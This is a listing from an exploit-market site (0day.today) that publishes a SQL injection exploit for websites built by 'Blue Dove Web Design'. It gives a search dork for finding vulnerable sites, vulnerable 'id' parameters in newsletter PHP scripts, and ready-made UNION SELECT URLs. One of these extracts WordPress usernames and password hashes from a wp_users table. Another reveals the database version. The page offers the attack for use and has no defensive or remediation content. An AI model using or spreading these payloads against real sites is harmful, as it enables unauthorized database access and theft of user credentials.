[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Blue Dove Word Press Development Sql Injection Vulnerability

Author
HackXBack
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10796
Category
web applications
Date add
08-02-2010
Platform
unsorted
=====================================
Blue Dove Sql Injection Vulnerability
=====================================

.:. Bug Type : Sql Injection
.:. Dork : "powered by Blue Dove Web Design"
 
####################################################################
 
===[ Exploit ]===
 
http://server/path/file.php?id=null[SQL]
 
http://server/newsletter/newsletter.php?Id=null[SQL]
 
 
===[ Example ]===
 
http://server/sections/newsletter.php?Id=-30%20union%20select%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14
 
http://server/newsletter/newsletter_new.php?Id=107+and+1=2+UNION%20SELECT%201,2,3,4,5,concat%28user_login,0x3a,user_pass%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50+from+jam_jam2.wp_users
 
http://server/newsletter/newsletter.php?Id=-null+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,@@version,29,30,31,32,33,34,35,36,37,38,39,40
 



#  0day.today [2024-11-16]  #